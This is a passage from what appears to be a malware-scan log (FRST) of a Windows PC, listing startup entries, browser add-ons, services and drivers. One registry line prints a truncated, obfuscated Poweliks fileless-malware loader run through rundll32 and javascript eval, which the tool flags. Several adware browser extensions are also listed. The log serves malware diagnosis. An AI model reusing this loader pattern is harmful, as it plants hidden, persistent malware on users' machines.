Support\APSDaemon.exe [43816 2014-07-31] (Apple Inc.) HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe HKLM-x32\...\Run: [QuickTime Task] => C:\Program Files (x86)\QuickTime\QTTask.exe [421888 2014-01-17] (Apple Inc.) HKLM-x32\...\Run: [CommonToolkitTray] => C:\Program Files (x86)\Fighters\Tray\FightersTray.exe [1681952 2014-03-24] (SPAMfighter ApS) HKLM-x32\...\Run: [sfagent] => C:\Program Files (x86)\Fighters\SPAMfighter\sfagent.exe [1051168 2014-04-30] (SPAMfighter ApS) HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-08-01] (Apple Inc.) HKLM-x32\...\Run: [sunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [256896 2014-07-25] (Oracle Corporation) HKLM\...\RunOnce: [NCPluginUpdater] => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe [21720 2014-10-21] (Hewlett-Packard) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [CAHeadless] => c:\Program Files (x86)\Adobe\Elements 10 Organizer\CAHeadless\ElementsAutoAnalyzer.exe [835224 2011-09-14] (Adobe Systems Incorporated) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [GoToMeeting] => C:\Users\Office\AppData\Local\Citrix\GoToMeeting\1767\g2mstart.exe [40304 2014-09-30] (Citrix Online, a division of Citrix Systems, Inc.) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [Akamai NetSession Interface] => C:\Users\Office\AppData\Local\Akamai\netsession_win.exe [4672920 2014-04-17] (Akamai Technologies, Inc.) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...\Run: [swg] => C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe [39408 2012-08-19] (Google Inc.) HKU\S-1-5-21-3549027879-2872290269-2961675323-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks! AppInit_DLLs: C:\PROGRA~2\KEYCRY~1\KEYCRY~4.DLL => C:\Program Files (x86)\KeyCryptSDK\KeyCrypt64(3).dll [88376 2013-07-24] (Zemana Ltd.) AppInit_DLLs-x32: C:\PROGRA~2\KEYCRY~1\KEYCRY~3.DLL => C:\Program Files (x86)\KeyCryptSDK\KeyCrypt32(3).dll [81160 2013-07-24] (Zemana Ltd.) Lsa: [Notification Packages] scecli c:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Constant Guard.lnk ShortcutTarget: Constant Guard.lnk -> C:\Program Files (x86)\Constant Guard Protection Suite\IDVault.exe (White Sky, Inc.) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Office.lnk ShortcutTarget: Microsoft Office.lnk -> C:\Program Files (x86)\Microsoft Office\Office\OSA9.EXE (Microsoft Corporation) Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.) Startup: C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk ShortcutTarget: Dropbox.lnk -> C:\Users\Office\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.) Startup: C:\Users\Office\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JustCloud.lnk ShortcutTarget: JustCloud.lnk -> C:\Program Files (x86)\JustCloud\JustCloud.exe (JustCloud.com) ShellIconOverlayIdentifiers: [OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ShellIconOverlayIdentifiers: [OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ShellIconOverlayIdentifiers: [OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\buShell.dll (Symantec Corporation) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://yahoo.com/ HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://search.audio4fun.com/ SearchScopes: HKLM - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF SearchScopes: HKLM - {9A72428D-BFB7-4BBD-82A5-CCA39358DDB5} URL = http://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKLM - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF SearchScopes: HKLM - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = http://en.wikipedia.org/wiki/Special:Search?search={searchTerms} SearchScopes: HKLM - {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=http://www.ebay.com/sch/i.html?_nkw={searchTerms} SearchScopes: HKLM-x32 - {2fa28606-de77-4029-af96-b231e3b8f827} URL = http://search.ask.com/web?q={searchterms}&l=dis&o=HPDTDF SearchScopes: HKLM-x32 - {9A72428D-BFB7-4BBD-82A5-CCA39358DDB5} URL = http://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms} SearchScopes: HKLM-x32 - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = http://search.yahoo.com/search?p={searchTerms}&ei={inputEncoding}&fr=chr-hp-psg&type=HPDTDF SearchScopes: HKLM-x32 - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = http://en.wikipedia.org/wiki/Special:Search?search={searchTerms} SearchScopes: HKLM-x32 - {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = http://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=http://www.ebay.com/sch/i.html?_nkw={searchTerms} SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKCU - {2fa28606-de77-4029-af96-b231e3b8f827} URL = SearchScopes: HKCU - {9A72428D-BFB7-4BBD-82A5-CCA39358DDB5} URL = SearchScopes: HKCU - {b7fca997-d0fb-4fe0-8afd-255e89cf9671} URL = SearchScopes: HKCU - {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = SearchScopes: HKCU - {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation) BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard) BHO-x32: &Yahoo! Toolbar Helper -> {02478D38-C3F9-4efb-9B51-7695ECA05670} -> C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.) BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation) BHO-x32: Norton Vulnerability Protection -> {6D53EC84-6AAE-4787-AEEE-F4628F01010C} -> C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\IPS\IPSBHO.DLL (Symantec Corporation) BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation) BHO-x32: Java Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation) BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.) BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation) BHO-x32: Constant Guard Protection Suite -> {B84CDBE7-1B46-494B-A188-01D4C52DEB61} -> C:\ProgramData\White Sky, Inc\ID Vault\IEBHO1.14.922.1\NativeBHO.dll (WhiteSky) BHO-x32: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation) BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard) Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine64\21.6.0.32\coIEPlg.dll (Symantec Corporation) Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) Toolbar: HKLM-x32 - Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files (x86)\Yahoo!\Companion\Installs\cpn0\yt.dll (Yahoo! Inc.) Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\coIEPlg.dll (Symantec Corporation) Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.) Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.) DPF: HKLM-x32 {17492023-C23A-453E-A040-C7C580BBF700} http://download.microsoft.com/download/E/5/6/E5611B10-0D6D-4117-8430-A67417AA88CD/LegitCheckControl.cab DPF: HKLM-x32 {F27237D7-93C8-44C2-AC6E-D6057B9A918F} https://iportal.safeway.com/dana-cached/sc/JuniperSetupClient.cab Handler: intu-help-qb1 - {9B0F96C7-2E4B-433e-ABF3-043BA1B54AE3} - No File Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - No File Handler-x32: intu-help-qb1 - {9B0F96C7-2E4B-433e-ABF3-043BA1B54AE3} - C:\Program Files (x86)\Intuit\QuickBooks 2008\HelpAsyncPluggableProtocol.dll (TODO: <Company name>) Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\windows\SysWOW64\mscoree.dll (Microsoft Corporation) Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies) Tcpip\Parameters: [DhcpNameServer] 192.168.1.1 FireFox: ======== FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF64_15_0_0_152.dll () FF Plugin: @microsoft.com/GENUINE -> disabled No File FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @adobe.com/FlashPlayer -> C:\windows\SysWOW64\Macromed\Flash\NPSWF32_15_0_0_152.dll () FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll () FF Plugin-x32: @java.com/DTPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation) FF Plugin-x32: @java.com/JavaPlugin,version=10.67.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation) FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation) FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.5\npGoogleUpdate3.dll (Google Inc.) FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll () FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.) FF Plugin HKCU: @citrixonline.com/appdetectorplugin -> C:\Users\Office\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online) FF HKLM-x32\...\Firefox\Extensions: [{2D3F3651-74B9-4795-BDEC-6DA2F431CB62}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn FF Extension: Norton Toolbar - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\coFFPlgn [2014-10-26] FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension FF Extension: SmartPrintButton - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2012-11-28] FF HKLM-x32\...\Firefox\Extensions: [{BBDA0591-3099-440a-AA10-41764D9DB4DB}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF FF Extension: Norton Vulnerability Protection - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\N360_21.1.0.18\IPSFF [2013-12-01] Chrome: ======= CHR HomePage: Default -> hxxp://www.google.com/ CHR StartupUrls: Default -> "hxxp://www.google.com/" CHR Plugin: (Remoting Viewer) - internal-remoting-viewer CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\ppGoogleNaClPluginChrome.dll No File CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\pdf.dll () CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\38.0.2125.104\gcswf32.dll No File CHR Plugin: (Norton Confidential) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk\2012.5.5.11_0\npcoplgn.dll No File CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.115\npGoogleUpdate3.dll No File CHR Plugin: (Windows Live™ Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) CHR Plugin: (Silverlight Plug-In) - c:\Program Files (x86)\Microsoft Silverlight\4.0.50401.0\npctrl.dll No File CHR Profile: C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-25] CHR Extension: (Bazaar Friend) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\bmobdmpfgfimbnmhhnkmmecdboblafdh [2013-08-09] CHR Extension: (Boston MarketOne) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\dleekdifoepfadaikncodjgnkkffkccd [2013-09-01] CHR Extension: (WebToSave) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\efbkdhmfnmnmfimllbjamfodcoanhmdd [2013-10-16] CHR Extension: (Coupons Malibu) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\hnofepcmbghfcimfbjicplikedjcnalm [2013-10-16] CHR Extension: (Norton Identity Safe) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\iikflkcanblccfahdhdonehdalibjnif [2014-08-23] CHR Extension: (Real Summer Sale) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\lladpgmmlijbmhfknhgkenkhikoaapmj [2013-08-02] CHR Extension: (Google Wallet) - C:\Users\Office\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-10-16] CHR HKLM\...\Chrome\Extension: [bmobdmpfgfimbnmhhnkmmecdboblafdh] - C:\Users\Office\AppData\Local\BazaarFriend.crx [2013-08-07] CHR HKLM\...\Chrome\Extension: [dleekdifoepfadaikncodjgnkkffkccd] - C:\Users\Office\AppData\Local\BostonMarketOne.crx [2013-08-13] CHR HKLM\...\Chrome\Extension: [efbkdhmfnmnmfimllbjamfodcoanhmdd] - C:\Users\Office\AppData\Local\WebToSave.crx [2013-09-03] CHR HKLM\...\Chrome\Extension: [hnofepcmbghfcimfbjicplikedjcnalm] - C:\Users\Office\AppData\Local\CouponsMalibu.crx [2013-09-05] CHR HKLM\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\Office\AppData\Local\newhb.crx [2013-08-01] CHR HKLM\...\Chrome\Extension: [lladpgmmlijbmhfknhgkenkhikoaapmj] - C:\Users\Office\AppData\Local\RealSummerSale.crx [2013-08-01] CHR HKLM\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-15] CHR HKCU\...\Chrome\Extension: [bmobdmpfgfimbnmhhnkmmecdboblafdh] - C:\Users\Office\AppData\Local\BazaarFriend.crx [2013-08-07] CHR HKCU\...\Chrome\Extension: [dleekdifoepfadaikncodjgnkkffkccd] - C:\Users\Office\AppData\Local\BostonMarketOne.crx [2013-08-13] CHR HKCU\...\Chrome\Extension: [efbkdhmfnmnmfimllbjamfodcoanhmdd] - C:\Users\Office\AppData\Local\WebToSave.crx [2013-09-03] CHR HKCU\...\Chrome\Extension: [hnofepcmbghfcimfbjicplikedjcnalm] - C:\Users\Office\AppData\Local\CouponsMalibu.crx [2013-09-05] CHR HKCU\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\Office\AppData\Local\newhb.crx [2013-08-01] CHR HKCU\...\Chrome\Extension: [lladpgmmlijbmhfknhgkenkhikoaapmj] - C:\Users\Office\AppData\Local\RealSummerSale.crx [2013-08-01] CHR HKLM-x32\...\Chrome\Extension: [bmobdmpfgfimbnmhhnkmmecdboblafdh] - C:\Users\Office\AppData\Local\BazaarFriend.crx [2013-08-07] CHR HKLM-x32\...\Chrome\Extension: [dleekdifoepfadaikncodjgnkkffkccd] - C:\Users\Office\AppData\Local\BostonMarketOne.crx [2013-08-13] CHR HKLM-x32\...\Chrome\Extension: [efbkdhmfnmnmfimllbjamfodcoanhmdd] - C:\Users\Office\AppData\Local\WebToSave.crx [2013-09-03] CHR HKLM-x32\...\Chrome\Extension: [hnofepcmbghfcimfbjicplikedjcnalm] - C:\Users\Office\AppData\Local\CouponsMalibu.crx [2013-09-05] CHR HKLM-x32\...\Chrome\Extension: [kcendgajlhoaiiccpijilcpmgphfflnj] - C:\Users\Office\AppData\Local\newhb.crx [2013-08-01] CHR HKLM-x32\...\Chrome\Extension: [lladpgmmlijbmhfknhgkenkhikoaapmj] - C:\Users\Office\AppData\Local\RealSummerSale.crx [2013-08-01] CHR HKLM-x32\...\Chrome\Extension: [mkfokfffehpeedafpekjeddnmnjhmcmk] - C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\Exts\Chrome.crx [2014-10-15] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 AdobeActiveFileMonitor10.0; c:\Program Files (x86)\Adobe\Elements 10 Organizer\PhotoshopElementsFileAgent.exe [169624 2011-09-14] (Adobe Systems Incorporated) R2 BackupStack; C:\Program Files (x86)\JustCloud\BackupStack.exe [36936 2014-09-10] (Just Develop It) <==== ATTENTION R2 CalendarSynchService; C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe [16384 2011-08-16] (Hewlett-Packard) [File not signed] R2 havasvc; C:\Program Files (x86)\Belkin\@TV\Common\havasvc.exe [150224 2012-12-27] (Monsoon Multimedia Inc.) [File not signed] R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed] S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed] R2 LMIGuardianSvc; C:\Program Files (x86)\LogMeIn\x64\LMIGuardianSvc.exe [376144 2014-07-18] (LogMeIn, Inc.) R2 LMIMaint; C:\Program Files (x86)\LogMeIn\x64\RaMaint.exe [226640 2014-07-18] (LogMeIn, Inc.) R2 LogMeIn; C:\Program Files (x86)\LogMeIn\x64\LogMeIn.exe [407424 2012-06-08] (LogMeIn, Inc.) R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1871160 2014-10-01] (Malwarebytes Corporation) R2 MBAMService; C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [968504 2014-10-01] (Malwarebytes Corporation) R2 N360; C:\Program Files (x86)\Norton Security Suite\Engine\21.6.0.32\N360.exe [265040 2014-10-02] (Symantec Corporation) R2 NOBU; C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe [2804568 2010-06-01] (Symantec Corporation) R2 NovacomD; C:\Program Files\Palm, Inc\novacomd\amd64\novacomd.exe [72192 2011-06-24] (Palm) [File not signed] R2 pdfcDispatcher; C:\Program Files (x86)\PDF Complete\pdfsvc.exe [1134584 2012-04-04] (PDF Complete Inc) R2 Pml Driver HPZ12; C:\windows\system32\HPZipm12.dll [60416 2009-06-22] (Hewlett-Packard) [File not signed] R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [20480 2009-09-16] (Intuit) [File not signed] S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2007-05-24] (Intuit Inc.) [File not signed] R2 SPAMfighter Update Service; C:\Program Files (x86)\Fighters\SPAMfighter\sfus.exe [216608 2014-04-30] (SPAMfighter ApS) R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [311296 2012-03-30] (IDT, Inc.) [File not signed] R2 Suite Service; C:\Program Files (x86)\Fighters\FighterSuiteService.exe [1282592 2014-03-14] (SPAMfighter ApS) R2 wltrysvc; C:\Program Files\Broadcom\Broadcom 802.11\bcmwltry.exe [5856256 2011-11-24] (Broadcom Corporation) [File not signed] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R1 AntiLog32; C:\windows\system32\drivers\AntiLog64.sys [49752 2014-10-08] (Zemana Ltd.) R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [163368 2012-04-01] (Broadcom Corporation.) R1 BHDrvx64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\BASHDefs\20141016.001\BHDrvx64.sys [1587416 2014-10-03] (Symantec Corporation) R1 ccSet_N360; C:\Windows\system32\drivers\N360x64\1506000.020\ccSetx64.sys [162392 2013-09-25] (Symantec Corporation) R1 eeCtrl; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\eeCtrl64.sys [487216 2014-09-08] (Symantec Corporation) R3 EraserUtilRebootDrv; C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys [142640 2014-09-08] (Symantec Corporation) R3 havabus; C:\Windows\System32\DRIVERS\havabus.sys [45056 2012-12-27] (Monsoon Multimedia Inc.) R3 HAVATV; C:\Windows\System32\DRIVERS\HAVATV.sys [189568 2012-12-27] (Monsoon Multimedia Inc.) R3 HavaTV_10; C:\Windows\System32\DRIVERS\HavaTV_10.sys [189568 2012-12-27] (Monsoon Multimedia Inc.) R1 IDSVia64; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\IPSDefs\20141024.001\IDSvia64.sys [633560 2014-08-29] (Symantec Corporation) R3 keycrypt; C:\Windows\System32\DRIVERS\KeyCrypt64.sys [25056 2013-07-24] (Zemana Ltd.) R2 LMIInfo; C:\Program Files (x86)\LogMeIn\x64\RaInfo.sys [16056 2013-05-26] (LogMeIn, Inc.) S4 LMIRfsClientNP; No ImagePath S3 Logi_Headset_DFU; C:\Windows\System32\Drivers\lhusbdfuamd64.sys [44136 2014-03-07] (CSR plc.) R3 MBAMProtector; C:\windows\system32\drivers\mbam.sys [25816 2014-10-01] (Malwarebytes Corporation) R3 MBAMSwissArmy; C:\windows\system32\drivers\MBAMSwissArmy.sys [129752 2014-10-26] (Malwarebytes Corporation) R3 MBAMWebAccessControl; C:\windows\system32\drivers\mwac.sys [63704 2014-10-01] (Malwarebytes Corporation) R3 NAVENG; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141026.001\ENG64.SYS [129752 2014-09-08] (Symantec Corporation) R3 NAVEX15; C:\Program Files (x86)\Norton Security Suite\NortonData\21.1.0.18\Definitions\VirusDefs\20141026.001\EX64.SYS [2137304 2014-09-08] (Symantec Corporation) R1 NEOFLTR_710_19757; C:\windows\system32\Drivers\NEOFLTR_710_19757.SYS [99152 2011-11-14] (Juniper Networks) S3 SNPSTD3; C:\Windows\System32\DRIVERS\snpstd3.sys [10550272 2007-03-27] (Sonix Co. Ltd.) R1 SRTSP; C:\Windows\System32\Drivers\N360x64\1506000.020\SRTSP64.SYS [876248 2014-08-25] (Symantec Corporation) R1 SRTSPX; C:\Windows\system32\drivers\N360x64\1506000.020\SRTSPX64.SYS [37592 2014-08-25] (Symantec Corporation) S3 ssmirrdr; C:\Windows\System32\DRIVERS\ssmirrdr.sys [10112 2011-03-14] (support.com, Inc) R2 sxuptp; C:\Windows\System32\DRIVERS\sxuptp.sys [299184 2011-05-19] (silex technology, Inc.) R0 SymDS; C:\Windows\System32\drivers\N360x64\1506000.020\SYMDS64.SYS [493656 2013-09-09] (Symantec Corporation) R0 SymEFA; C:\Windows\System32\drivers\N360x64\1506000.020\SYMEFA64.SYS [1148120 2014-08-25] (Symantec Corporation) R3 SymEvent; C:\windows\system32\Drivers\SYMEVENT64x86.SYS [177752 2013-11-25] (Symantec Corporation) R1 SymIRON; 